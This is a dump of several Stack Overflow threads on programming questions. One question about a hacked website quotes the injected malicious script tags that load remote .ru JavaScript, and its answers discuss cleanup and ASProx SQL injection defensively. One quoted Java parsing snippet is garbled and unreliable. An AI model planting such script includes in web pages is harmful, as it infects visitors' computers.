text
stringlengths 8
267k
| meta
dict |
---|---|
Q: How to get Indexing Service and MODI to produce Full-text over OCR? I have configured Indexing Service to index my files, which also include scanned images saved as hi-res TIFF files. I also installed MS Office 2003+ and configured MS Office Document Imaging (MODI) correctly, so I can perform OCR on my images and even embed the OCR'd text into TIFFs.
Indexing Service is able to index and find those TIFF-s that were manually OCR'd and re-saved with text data (using MS Document Imaging tool).
Turns out, Data Execution Prevention (DEP) which is deployed with Windows XP SP2 thinks MODI is malicious and refuses to let it do its magic. I have been able to get it to work by turning DEP off completely, but I found this solution to be inelegant.
Is there a better solution to make this work, without disabling DEP?
A: Disable DEP for specific applications.
How to Disable DEP for Specific Applications
*
*Click the Start button on your Windows computer and choose Computer > System Properties > Advanced System Settings.
*From the System Properties dialog, select Settings.
*Select the Data Execution Prevention tab.
*Select Turn on DEP for all programs and services except those I select.
Click Add and use the browse feature to browse to the program executable you want to exclude—for example, excel.exe or word.exe.
Depending on your version of Windows, you may need to access the System Properties dialog box by right-clicking This PC or Computer from Windows Explorer.
*
*In Windows Explorer, right-click and choose Properties > Advanced System Settings > System Properties.
*Select Advanced > Performance > Data Execution Prevention.
*Select Turn on DEP for all programs and services except those I select.
*Click Add and use the browse feature to browse to the program executable you want to exclude.
Exclude:
C:\Program Files\Common Files\Microsoft Shared\MODI\11.0\MSPOCRDC.EXE
C:\Program Files\Common Files\Microsoft Shared\MODI\11.0\MSPSCAN.EXE
C:\Program Files\Common Files\Microsoft Shared\MODI\11.0\MSPVIEW.EXE
Additional information not part of the answer:
To obtain and install MODI on newest versions of Windows see:
"Microsoft Office Document Imaging – Office 2010 to Office 2016"
References:
"Exclude Programs From DEP (Data Execution Prevention)"
"Microsoft Office Document Scanning error"
MODI is part of (free) "Microsoft SharePoint Designer 2007".
| {
"language": "en",
"url": "https://stackoverflow.com/questions/2959",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "75"
} |
Q: What are the different methods to parse strings in Java? For parsing player commands, I've most often used the split method to split a string by delimiters and then to then just figure out the rest by a series of ifs or switches. What are some different ways of parsing strings in Java?
A: I would look at Java migrations of Zork, and lean towards a simple Natural Language Processor (driven either by tokenizing or regex) such as the following (from this link):
public static boolean simpleNLP( String inputline, String keywords[])
{
int i;
int maxToken = keywords.length;
int to,from;
if( inputline.length() = inputline.length()) return false; // check for blank and empty lines
while( to >=0 )
{
to = inputline.indexOf(' ',from);
if( to > 0){
lexed.addElement(inputline.substring(from,to));
from = to;
while( inputline.charAt(from) == ' '
&& from = keywords.length) { status = true; break;}
}
}
return status;
}
...
Anything which gives a programmer a reason to look at Zork again is good in my book, just watch out for Grues.
...
A: Sun itself recommends staying away from StringTokenizer and using the String.spilt method instead.
You'll also want to look at the Pattern class.
A: Another vote for ANTLR/ANTLRWorks. If you create two versions of the file, one with the Java code for actually executing the commands, and one without (with just the grammar), then you have an executable specification of the language, which is great for testing, a boon for documentation, and a big timesaver if you ever decide to port it.
A: If this is to parse command lines I would suggest using Commons Cli.
The Apache Commons CLI library provides an API for processing command line interfaces.
A: Try JavaCC a parser generator for Java.
It has a lot of features for interpreting languages, and it's well supported on Eclipse.
A: @CodingTheWheel Heres your code, a bit clean up and through eclipse (ctrl+shift+f) and the inserted back here :)
Including the four spaces in front each line.
public static boolean simpleNLP(String inputline, String keywords[]) {
if (inputline.length() < 1)
return false;
List<String> lexed = new ArrayList<String>();
for (String ele : inputline.split(" ")) {
lexed.add(ele);
}
boolean status = false;
to = 0;
for (i = 0; i < lexed.size(); i++) {
String s = (String) lexed.get(i);
if (s.equalsIgnoreCase(keywords[to])) {
to++;
if (to >= keywords.length) {
status = true;
break;
}
}
}
return status;
}
A: I really like regular expressions. As long as the command strings are fairly simple, you can write a few regexes that could take a few pages of code to manually parse.
I would suggest you check out http://www.regular-expressions.info for a good intro to regexes, as well as specific examples for Java.
A: I assume you're trying to make the command interface as forgiving as possible. If this is the case, I suggest you use an algorithm similar to this:
*
*Read in the string
*
*Split the string into tokens
*Use a dictionary to convert synonyms to a common form
*For example, convert "hit", "punch", "strike", and "kick" all to "hit"
*Perform actions on an unordered, inclusive base
*Unordered - "punch the monkey in the face" is the same thing as "the face in the monkey punch"
*Inclusive - If the command is supposed to be "punch the monkey in the face" and they supply "punch monkey", you should check how many commands this matches. If only one command, do this action. It might even be a good idea to have command priorities, and even if there were even matches, it would perform the top action.
A: Parsing manually is a lot of fun... at the beginning:)
In practice if commands aren't very sophisticated you can treat them the same way as those used in command line interpreters. There's a list of libraries that you can use: http://java-source.net/open-source/command-line. I think you can start with apache commons CLI or args4j (uses annotations). They are well documented and really simple in use. They handle parsing automatically and the only thing you need to do is to read particular fields in an object.
If you have more sophisticated commands, then maybe creating a formal grammar would be a better idea. There is a very good library with graphical editor, debugger and interpreter for grammars. It's called ANTLR (and the editor ANTLRWorks) and it's free:) There are also some example grammars and tutorials.
A: A simple string tokenizer on spaces should work, but there are really many ways you could do this.
Here is an example using a tokenizer:
String command = "kick person";
StringTokenizer tokens = new StringTokenizer(command);
String action = null;
if (tokens.hasMoreTokens()) {
action = tokens.nextToken();
}
if (action != null) {
doCommand(action, tokens);
}
Then tokens can be further used for the arguments. This all assumes no spaces are used in the arguments... so you might want to roll your own simple parsing mechanism (like getting the first whitespace and using text before as the action, or using a regular expression if you don't mind the speed hit), just abstract it out so it can be used anywhere.
A: When the separator String for the command is allways the same String or char (like the ";") y recomend you use the StrinkTokenizer class:
StringTokenizer
but when the separator varies or is complex y recomend you to use the regular expresions, wich can be used by the String class itself, method split, since 1.4. It uses the Pattern class from the java.util.regex package
Pattern
A: If the language is dead simple like just
VERB NOUN
then splitting by hand works well.
If it's more complex, you should really look into a tool like ANTLR or JavaCC.
I've got a tutorial on ANTLR (v2) at http://javadude.com/articles/antlrtut which will give you an idea of how it works.
A: JCommander seems quite good, although I have yet to test it.
A: If your text contains some delimiters then you can your split method.
If text contains irregular strings means different format in it then you must use regular expressions.
A: split method can split a string into an array of the specified substring expression regex.
Its arguments in two forms, namely: split (String regex) and split (String regex, int limit), which split (String regex) is actually by calling split (String regex, int limit) to achieve, limit is 0. Then, when the limit> 0 and limit <0 represents what?
When the jdk explained: when limit> 0 sub-array lengths up to limit, that is, if possible, can be limit-1 sub-division, remaining as a substring (except by limit-1 times the character has string split end);
limit <0 indicates no limit on the length of the array;
limit = 0 end of the string empty string will be truncated.
StringTokenizer class is for compatibility reasons and is preserved legacy class, so we should try to use the split method of the String class.
refer to link
| {
"language": "en",
"url": "https://stackoverflow.com/questions/2968",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "55"
} |
Q: My website got hacked.. What should I do? My dad called me today and said people going to his website were getting 168 viruses trying to download to their computers. He isn't technical at all, and built the whole thing with a WYSIWYG editor.
I popped his site open and viewed the source, and there was a line of Javascript includes at the bottom of the source right before the closing HTML tag. They included this file (among many others): http://www.98hs.ru/js.js <-- TURN OFF JAVASCRIPT BEFORE YOU GO TO THAT URL.
So I commented it out for now. It turns out his FTP password was a plain dictionary word six letters long, so we think that's how it got hacked. We've changed his password to an 8+ digit non-word string (he wouldn't go for a passphrase since he is a hunt-n-peck typer).
I did a whois on 98hs.ru and found it is hosted from a server in Chile. There is actually an e-mail address associated with it too, but I seriously doubt this person is the culprit. Probably just some other site that got hacked...
I have no idea what to do at this point though as I've never dealt with this sort of thing before. Anyone have any suggestions?
He was using plain jane un-secured ftp through webhost4life.com. I don't even see a way to do sftp on their site. I'm thinking his username and password got intercepted?
So, to make this more relevant to the community, what are the steps you should take/best practices you should follow to protect your website from getting hacked?
For the record, here is the line of code that "magically" got added to his file (and isn't in his file on his computer -- I've left it commented out just to make absolute sure it won't do anything on this page, although I'm sure Jeff would guard against this):
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
A: You mention your Dad was using a website publishing tool.
If the publishing tool publishes from his computer to the server, it may be the case that his local files are clean, and that he just needs to republish to the server.
He should see if there's a different login method to his server than plain FTP, though... that's not very secure because it sends his password as clear-text over the internet.
A: With a six word character password, he may have been brute forced. That is more likely than his ftp being intercepted, but it could be that too.
Start with a stronger password. (8 characters is still fairly weak)
See if this link to an internet security blog is helpful.
A: Is the site just plain static HTML? i.e. he hasn't managed to code himself an upload page that permits anyone driving by to upload compromised scripts/pages?
Why not ask webhost4life if they have any FTP logs available and report the issue to them. You never know, they may be quite receptive and find out for you exactly what happened?
I work for a shared hoster and we always welcome reports such as these and can usually pinpoint the exact vector of attack based and advise as to where the customer went wrong.
A: Try and gather as much information as you can. See if the host can give you a log showing all the FTP connections that were made to your account. You can use those to see if it was even an FTP connection that was used to make the change and possibly get an IP address.
If you're using a prepacked software like Wordpress, Drupal, or anything else that you didn't code there may be vulnerabilities in upload code that allows for this sort of modification. If it is custom built, double check any places where you allow users to upload files or modify existing files.
The second thing would be to take a dump of the site as-is and check everything for other modifications. It may just be one single modification they made, but if they got in via FTP who knows what else is up there.
Revert your site back to a known good status and, if need be, upgrade to the latest version.
There is a level of return you have to take into account too. Is the damage worth trying to track the person down or is this something where you just live and learn and use stronger passwords?
A: I know this is a little late in the game, but the URL mentioned for the JavaScript is mentioned in a list of sites known to have been part of the ASPRox bot resurgence that started up in June (at least that's when we were getting flagged with it). Some details about it are mentioned below:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
The nasty thing about this is that effectively every varchar type field in the database is "infected" to spit out a reference to this URL, in which the browser gets a tiny iframe that turns it into a bot. A basic SQL fix for this can be found here:
http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx
The scary thing though is that the virus looks to the system tables for values to infect and a lot of shared hosting plans also share the database space for their clients. So most likely it wasn't even your dad's site that was infected, but somebody else's site within his hosting cluster that wrote some poor code and opened the door to SQL Injection attack.
If he hasn't done so yet, I'd send an URGENT e-mail to their host and give them a link to that SQL code to fix the entire system. You can fix your own affected database tables, but most likely the bots that are doing the infection are going to pass right through that hole again and infect the whole lot.
Hopefully this gives you some more info to work with.
EDIT: One more quick thought, if he's using one of the hosts online design tools for building his website, all of that content is probably sitting in a column and was infected that way.
A: Unplug the webserver without shutting it down to avoid shutdown scripts. Analyze the hard disk through another computer as a data drive and see if you can determine the culprit through log files and things of that nature. Verify that the code is safe and then restore it from a backup.
A: This happened to a client of mine recently that was hosted on ipower. I'm not sure if your hosting environment was Apache based, but if it was be sure to double check for .htaccess files that you did not create, particularly above the webroot and inside of image directories, as they tend to inject some nastiness there as well (they were redirecting people depending on where they came from in the refer). Also check any that you did create for code that you did not write.
A: We had been hacked from same guys apparently! Or bots, in our case. They used SQL injection in URL on some old classic ASP sites that nobody maintain anymore. We found attacking IPs and blocked them in IIS. Now we must refactor all old ASP.
So, my advice is to take a look at IIS logs first, to find if problem is in your site's code or server configuration.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/2970",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "23"
} |
Q: Bringing Window to the Front in C# using Win32 API I am writing an application that needs to bring window of an external app to the foreground, and not necessarily steal focus (there is a setting the user can toggle to steal/not steal focus).
What is the best way to go about this using the win32 API? I have tried SetForeground() but it always steals focus and does not consistenly work.
What is the best way to go about this? Any thoughts?
A:
What is the difference between SetForeGroundWindow, SetActiveWindow, and BringWindowToTop? It appears as if they all do the same thing.
According to MSDN, SetForeGroundWindow will activate the window and direct keyboard focus to it. This attempts to work even when your process is in the background. SetActiveWindow does the same thing as SetForeGroundWindow, but it doesn't do anything if your application isn't the frontmost application. Finally, BringWindowToTop only brings the window to the top, and doesn't change the keyboard focus.
A: You can try the BringWindowToTop function to not steal focus. I haven't used it, but it seems to be what you're looking for.
A: Have you tried using SetWindowPos. This is the canonical function for moving, resizing and setting z-order in Windows. There is a SWP_NOACTIVATE flag you can use. Look at http://msdn.microsoft.com/en-us/library/ms633545(VS.85).aspx. I have not tried this on a window belonging to another process, but it is probably worth a try.
A: SetForegroundWindow is supposed to steal focus and there are certain cases where it will fail.
The SetForegroundWindow function puts the thread that created the specified window into the foreground and activates the window. Keyboard input is directed to the window
Try capturing the focus with SetCapture prior to making the call. Also look into different ways of bringing the window to the front: SetForeGroundWindow, SetActiveWindow, even simulating a mouse click can do this.
A: SetWindowPos + SWP_NOACTIVATE does the job.
A: You could use FindWindow to get the HWND of the window, then use the BringWindowToTop function found in the Win32 API.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/2987",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "47"
} |
Q: What problems can be solved, or tackled more easily, using graphs and trees? What are the most common problems that can be solved with both these data structures?
It would be good for me to have also recommendations on books that:
*
*Implement the structures
*Implement and explain the reasoning of the algorithms that use them
A: Circuit diagrams.
Compilation (Directed Acyclic graphs)
Maps. Very compact as graphs.
Network flow problems.
Decision trees for expert systems (sic)
Fishbone diagrams for fault finding, process improvment, safety analysis. For bonus points, implement your error recovery code as objects that are the fishbone diagram.
A: Just about every problem can be re-written in terms of graph theory. I'm not kidding, look at any book on NP complete problems, there are some pretty wacky problems that get turned into graph theory because we have good tools for working with graphs...
A: The Algorithm Design Manual contains some interesting case studies with creative use of graphs. Despite its name, the book is very readable and even entertaining at times.
A: The first thing I think about when I read this question is: what types of things use graphs/trees? and then I think backwards to how I could use them.
For example, take two common uses of a tree:
*
*The DOM
*File systems
The DOM, and XML for that matter, resemble tree structures.
It makes sense, too. It makes sense because of how this data needs to be arranged. A file system, too. On a UNIX system there's a root node, and branching down below. When you mount a new device, you're attaching it onto the tree.
You should also be asking yourself: does the data fall into this type of structure? Create data structures that make sense to the problem and the rest will follow.
As far as being easier, I think thats relative. Are you good with recursive functions to traverse a tree/graph? What if you need to balance the tree?
Think about a program that solves a word search puzzle. You could map out all the letters of the word search into a graph and check surrounding nodes to see if that string is matching any of the words. But couldn't you just do the same with with a single array? All you really need to do is move an index to check letters to the left and right, and by the width to check above and below letters. Solving this problem with a graph isn't difficult, but it can create a lot of extra work and difficulty if you're not comfortable with using them - of course that shouldn't discourage you from doing it, especially if you are learning about them.
I hope that helps you think about these structures. As for a book recommendation, I'd have to go with Introduction to Algorithms.
A: There's a course for such things at my university: CSE 326. I didn't think the book was too useful, but the projects are fun and teach you a fair bit about implementing some of the simpler structures.
As for examples, one of the most common problems (by number of people using it) that's solved with trees is that of cell phone text entry. You can use trees, not necessarily binary, to represent the space of possible words that can come out of any given list of numbers that a user punches in very quickly.
A: Algorithms for Java: Part 5 by Robert Sedgewick is all about graph algorithms and datastructures. This would be a good first book to work through if you want to implement some graph algorithms.
A: Scene graphs for drawing graphics in games and multimedia applications heavily use trees and graphs. Nodes represents objects to be rendered, transformations, controls, groups, ...
Scene graphs usually have multiple layers and attributes which mean that you can draw only some node of a graph (attributes) in a specified order (layers). Depending on the kind of scene graph you have it can have two parralel structures: declarations and instantiation. Th
A: @DavidJoiner / all:
FWIW: A new version of the Algorithm Design Manual is due out any day now.
The entire course that he Prof Skiena developed this book for is also available on the web:
http://www.cs.sunysb.edu/~algorith/video-lectures/2007-1.html
A: Trees are used a lot more in functional programming languages because of their recursive nature.
Also, graphs and trees are a good way to model a lot of AI problems.
A: Games often use graphs to facilitate finding paths across the game world. The graph representation of the world can have algorithms such as breadth-first search or A* in order to find a route across it.
They also often use trees to represent entities within the world. If you have thousands of entities and need to find one at a certain position then iterating linearly through a list can be inefficient, especially if you need to do it often. Therefore the area can be subdivided into a tree to allow it to be searched more quickly. Just as a linear space can be efficiently searched with a binary search (and thus divided into a binary tree), 2D space can be divided into a quadtree and 3D space into an octree.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/2988",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "17"
} |
Q: Reverse DNS in Ruby? I'm in an environment with a lot of computers that haven't been
properly inventoried. Basically, no one knows which IP goes with which
mac address and which hostname. So I wrote the following:
# This script goes down the entire IP range and attempts to
# retrieve the Hostname and mac address and outputs them
# into a file. Yay!
require "socket"
TwoOctets = "10.26"
def computer_exists?(computerip)
system("ping -c 1 -W 1 #{computerip}")
end
def append_to_file(line)
file = File.open("output.txt", "a")
file.puts(line)
file.close
end
def getInfo(current_ip)
begin
if computer_exists?(current_ip)
arp_output = `arp -v #{current_ip}`
mac_addr = arp_output.to_s.match(/..:..:..:..:..:../)
host_name = Socket.gethostbyname(current_ip)
append_to_file("#{host_name[0]} - #{current_ip} - #{mac_addr}\n")
end
rescue SocketError => mySocketError
append_to_file("unknown - #{current_ip} - #{mac_addr}")
end
end
(6..8).each do |i|
case i
when 6
for j in (1..190)
current_ip = "#{TwoOctets}.#{i}.#{j}"
getInfo(current_ip)
end
when 7
for j in (1..255)
current_ip = "#{TwoOctets}.#{i}.#{j}"
getInfo(current_ip)
end
when 8
for j in (1..52)
current_ip = "#{TwoOctets}.#{i}.#{j}"
getInfo(current_ip)
end
end
end
Everything works except it does not find a Reverse DNS.
Sample output that I'm getting is this:
10.26.6.12 - 10.26.6.12 - 00:11:11:9B:13:9F
10.26.6.17 - 10.26.6.17 - 08:00:69:9A:97:C3
10.26.6.18 - 10.26.6.18 - 08:00:69:93:2C:E2
If I do nslookup 10.26.6.12 then I get the correct reverse DNS so
that shows that my machine is seeing the DNS server.
I have tried Socket.gethostbyname, gethostbyaddr, but it doesn't work.
Any guidance will be much appreciated.
A: I would check out getaddrinfo. If you replace the line:
host_name = Socket.gethostbyname(current_ip)
with:
host_name = Socket.getaddrinfo(current_ip, 0, Socket::AF_UNSPEC, Socket::SOCK_STREAM, nil, Socket::AI_CANONNAME)[0][1]
The getaddrinfo function returns an array of arrays. You can read more about it at:
Ruby Socket Docs
A: Today I also needed reverse DNS lookup and I've found very simple standard solution:
require 'resolv'
host_name = Resolv.getname(ip_address_here)
It seems it uses timeout which helps in rough cases.
A: This also works:
host_name = Socket.getaddrinfo(current_ip,nil)
append_to_file("#{host_name[0][2]} - #{current_ip} - #{mac_addr}\n")
I'm not sure why gethostbyaddr didn't also work.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/2993",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: Using ASP.NET Dynamic Data / LINQ to SQL, how do you have two table fields have a relationship to the same foreign key? I am using ASP.NET Dynamic Data for a project and I have a table that has two seperate fields that link to the same foreign key in a different table.
This relationship works fine in SQL Server.
However, in the LINQ to SQL model in the ASP.NET Dynamic Data model, only the first field's relationship is reflected. If I attempt to add the second relationship manually, it complains that it "Cannot create an association "ForeignTable_BaseTable". The same property is listed more than once: "Id"."
This MSDN article gives such helpful advice as:
*
*Examine the message and note the property specified in the message.
*Click OK to dismiss the message box.
*Inspect the Association Properties and remove the duplicate entries.
*Click OK.
A: The solution is to delete and re-add BOTH tables to the LINQ to SQL diagram, not just the one you have added the second field and keys to.
Alternatively, it appears you can make two associations using the LINQ to SQL interface - just don't try and bundle them into a single association.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3004",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: How can we generate getters and setters in Visual Studio? By "generate", I mean auto-generation of the code necessary for a particular selected (set of) variable(s).
But any more explicit explication or comment on good practice is welcome.
A: If you are using Visual Studio 2005 and up, you can create a setter/getter real fast using the insert snippet command.
Right click on your code, click on Insert Snippet (Ctrl+K,X), and then choose "prop" from the list.
A: Visual Studio also has a feature that will generate a Property from a private variable.
If you right-click on a variable, in the context menu that pops up, click on the "Refactor" item, and then choose Encapsulate Field.... This will create a getter/setter property for a variable.
I'm not too big a fan of this technique as it is a little bit awkward to use if you have to create a lot of getters/setters, and it puts the property directly below the private field, which bugs me, because I usually have all of my private fields grouped together, and this Visual Studio feature breaks my class' formatting.
A: I use Visual Studio 2013 Professional.
*
*Place your cursor at the line of an instance variable.
*Press combine keys Ctrl + R, Ctrl + E, or click the right mouse button. Choose context menu Refactor → Encapsulate Field..., and then press OK.
*In Preview Reference Changes - Encapsulate Field dialog, press button Apply.
*This is result:
You also place the cursor for choosing a property. Use menu Edit → Refactor → Encapsulate Field...
*
*Other information:
Since C# 3.0 (November 19th 2007), we can use auto-implemented properties (this is merely syntactic sugar).
And
private int productID;
public int ProductID
{
get { return productID; }
set { productID = value; }
}
becomes
public int ProductID { get; set; }
A: If you're using ReSharper, go into the ReSharper menu → Code → Generate...
(Or hit Alt + Ins inside the surrounding class), and you'll get all the options for generating getters and/or setters you can think of :-)
A: Rather than using Ctrl + K, X you can also just type prop and then hit Tab twice.
A: I created my own snippet that only adds {get; set;}. I made it just because I find prop → Tab to be clunky.
<?xml version="1.0" encoding="utf-8"?>
<CodeSnippets
xmlns="http://schemas.microsoft.com/VisualStudio/2005/CodeSnippet">
<CodeSnippet Format="1.0.0">
<Header>
<Title>get set</Title>
<Shortcut>get</Shortcut>
</Header>
<Snippet>
<Code Language="CSharp">
<![CDATA[{get; set;}]]>
</Code>
</Snippet>
</CodeSnippet>
</CodeSnippets>
With this, you type your PropType and PropName manually, then type get → Tab, and it will add the get set. It's nothing magical, but since I tend to type my access modifier first anyway, I may as well finish out the name and type.
A: In Visual Studio Community Edition 2015 you can select all the fields you want and then press Ctrl + . to automatically generate the properties.
You have to choose if you want to use the property instead of the field or not.
A: By generate, do you mean auto-generate? If that's not what you mean:
Visual Studio 2008 has the easiest implementation for this:
public PropertyType PropertyName { get; set; }
In the background this creates an implied instance variable to which your property is stored and retrieved.
However if you want to put in more logic in your Properties, you will have to have an instance variable for it:
private PropertyType _property;
public PropertyType PropertyName
{
get
{
//logic here
return _property;
}
set
{
//logic here
_property = value;
}
}
Previous versions of Visual Studio always used this longhand method as well.
A: You can also use "propfull" and hit TAB twice.
The variable and property with get and set will be generated.
A: Use the propfull keyword.
It will generate a property and a variable.
Type keyword propfull in the editor, followed by two TABs. It will generate code like:
private data_type var_name;
public data_type var_name1{ get;set;}
Video demonstrating the use of snippet 'propfull' (among other things), at 4 min 11 secs.
A: In visual studio 2019, select your properties like this:
Then press Ctrl+r
Then press Ctrl+e
A dialog will appear showing you the preview of the changes that are going to happen to your code. If everything looks good (which it mostly will), press OK.
A: In addition to the 'prop' snippet and auto-properties, there is a refactor option to let you select an existing field and expose it via a property (right click on the field → Refactor → Encapsulate Field...).
Also, if you don't like the 'prop' implementation, you can create your own snippets. Additionally, a third-party refactoring tool like ReSharper will give you even more features and make it easier to create more advanced snippets. I'd recommend ReSharper if you can afford it.
*
*http://msdn.microsoft.com/en-us/library/f7d3wz0k(VS.80).aspx
*Video demonstrating the use of snippet 'prop' (among other things), at 3 min 23 secs.
A: I don't have Visual Studio installed on my machine anymore (and I'm using Linux), but I do remember that there was an wizard hidden somewhere inside one of the menus that gave access to a class builder.
With this wizard, you could define all your classes' details, including methods and attributes. If I remember well, there was an option through which you could ask Visual Studio to create the setters and getters automatically for you.
I know it's quite vague, but check it out and you might find it.
A:
On behalf of the Visual Studio tool, we can easily generate C# properties using an online tool called C# property generator.
A: First get Extension just press (Ctrl + Shift + X) and install getter setter ....
After this, just select your variable and right click. Go to Command palette...
And type getter ... It will suggest generate get and set methods. Click on this...
A: I personaly use CTRL+. and then select-
"Encapsulated Fildes".
That's a short for this option- (How can we generate getters and setters in Visual Studio?).
*
*I marked the short for auto choosing refactoring (CTRL+. )
A: You just simply press Alt + Ins in Android Studio.
After declaring variables, you will get the getters and setters in the generated code.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3017",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "257"
} |
Q: What is recursion and when should I use it? One of the topics that seems to come up regularly on mailing lists and online discussions is the merits (or lack thereof) of doing a Computer Science Degree. An argument that seems to come up time and again for the negative party is that they have been coding for some number of years and they have never used recursion.
So the question is:
*
*What is recursion?
*When would I use recursion?
*Why don't people use recursion?
A: Recursion refers to a method which solves a problem by solving a smaller version of the problem and then using that result plus some other computation to formulate the answer to the original problem. Often times, in the process of solving the smaller version, the method will solve a yet smaller version of the problem, and so on, until it reaches a "base case" which is trivial to solve.
For instance, to calculate a factorial for the number X, one can represent it as X times the factorial of X-1. Thus, the method "recurses" to find the factorial of X-1, and then multiplies whatever it got by X to give a final answer. Of course, to find the factorial of X-1, it'll first calculate the factorial of X-2, and so on. The base case would be when X is 0 or 1, in which case it knows to return 1 since 0! = 1! = 1.
A: Consider an old, well known problem:
In mathematics, the greatest common divisor (gcd) … of two or more non-zero integers, is the largest positive integer that divides the numbers without a remainder.
The definition of gcd is surprisingly simple:
where mod is the modulo operator (that is, the remainder after integer division).
In English, this definition says the greatest common divisor of any number and zero is that number, and the greatest common divisor of two numbers m and n is the greatest common divisor of n and the remainder after dividing m by n.
If you'd like to know why this works, see the Wikipedia article on the Euclidean algorithm.
Let's compute gcd(10, 8) as an example. Each step is equal to the one just before it:
*
*gcd(10, 8)
*gcd(10, 10 mod 8)
*gcd(8, 2)
*gcd(8, 8 mod 2)
*gcd(2, 0)
*2
In the first step, 8 does not equal zero, so the second part of the definition applies. 10 mod 8 = 2 because 8 goes into 10 once with a remainder of 2. At step 3, the second part applies again, but this time 8 mod 2 = 0 because 2 divides 8 with no remainder. At step 5, the second argument is 0, so the answer is 2.
Did you notice that gcd appears on both the left and right sides of the equals sign? A mathematician would say this definition is recursive because the expression you're defining recurs inside its definition.
Recursive definitions tend to be elegant. For example, a recursive definition for the sum of a list is
sum l =
if empty(l)
return 0
else
return head(l) + sum(tail(l))
where head is the first element in a list and tail is the rest of the list. Note that sum recurs inside its definition at the end.
Maybe you'd prefer the maximum value in a list instead:
max l =
if empty(l)
error
elsif length(l) = 1
return head(l)
else
tailmax = max(tail(l))
if head(l) > tailmax
return head(l)
else
return tailmax
You might define multiplication of non-negative integers recursively to turn it into a series of additions:
a * b =
if b = 0
return 0
else
return a + (a * (b - 1))
If that bit about transforming multiplication into a series of additions doesn't make sense, try expanding a few simple examples to see how it works.
Merge sort has a lovely recursive definition:
sort(l) =
if empty(l) or length(l) = 1
return l
else
(left,right) = split l
return merge(sort(left), sort(right))
Recursive definitions are all around if you know what to look for. Notice how all of these definitions have very simple base cases, e.g., gcd(m, 0) = m. The recursive cases whittle away at the problem to get down to the easy answers.
With this understanding, you can now appreciate the other algorithms in Wikipedia's article on recursion!
A: There are a number of good explanations of recursion in this thread, this answer is about why you shouldn't use it in most languages.* In the majority of major imperative language implementations (i.e. every major implementation of C, C++, Basic, Python, Ruby,Java, and C#) iteration is vastly preferable to recursion.
To see why, walk through the steps that the above languages use to call a function:
*
*space is carved out on the stack for the function's arguments and local variables
*the function's arguments are copied into this new space
*control jumps to the function
*the function's code runs
*the function's result is copied into a return value
